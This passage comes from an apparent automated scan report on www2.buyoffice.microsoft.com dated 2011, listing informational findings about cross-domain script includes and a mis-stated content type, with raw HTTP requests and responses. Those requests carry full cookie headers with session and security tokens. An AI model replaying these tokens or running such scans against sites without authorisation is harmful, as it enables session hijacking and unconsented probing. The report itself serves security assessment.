MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE; op390basketpagegum=a0qm1h421k27asr09a3thb27asq0963la5754; op390basketpageliid=a0qm1h421k27asr09a3thb27asq0963la5754; C5_TRACKING_TOKEN=ed794bbb18b94d4ab7bed7013f542b2d

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:02:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:02:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
<![endif]-->

       
       <script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery.tools-1.1.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/TrackByAjax.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-latest.pack.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/superscript.js"></script>


<script type="text/javascript" src="//nexus.ensighten.com/microsoftstore/Bootstrap.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_globalTrial.js"></script>


<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/js/PPRSAEnc.js"></script>

<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/JSPublicKey.srf"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/MSLiveIdUtils.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/mtagconfig-2.1.js"></script>
...[SNIP]...
</script>


<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/framework/js/submitthrottle.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrendsasyncloader.js" type="text/javascript"></script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrends.js" type="text/javascript"></script>
...[SNIP]...

5.3. http://www2.buyoffice.microsoft.com/usa/promotion.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/promotion.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://office.microsoft.com/en-us/office-home-and-student-FX101845698.aspx
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b476b6d6346654e564530766873524f455753676b665970464852784e70374b6e6e6b725732635731316a412f366a34784c6c2b2f5061705a6d52434153316c39553d; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 21:58:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:54 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:54 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
<![endif]-->

       
       <script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery.tools-1.1.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/TrackByAjax.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-latest.pack.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/superscript.js"></script>


<script type="text/javascript" src="//nexus.ensighten.com/microsoftstore/Bootstrap.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_promotion_contentBody.js"></script>


<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/js/PPRSAEnc.js"></script>

<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/JSPublicKey.srf"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/MSLiveIdUtils.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/mtagconfig-2.1.js"></script>
...[SNIP]...
</script>


<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/framework/js/submitthrottle.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrendsasyncloader.js" type="text/javascript"></script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrends.js" type="text/javascript"></script>
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/liveperson.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /usa/liveperson.aspx?cache=1968341058&culture=en-us&mainpage=other HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 21:58:58 GMT
Content-Length: 4668
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:58 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:58 GMT; path=/
Vary: Accept-Encoding, User-Agent


document.write("<div id='lpChatDiv'></div>");
document.write("<noscript><p>Script section containing code for Liveperson Chat Solution</p></noscript>");
$(document).ready(function() {
var loc
...[SNIP]...

Report generated by XSS.CX at Sat Oct 29 08:01:35 CDT 2011.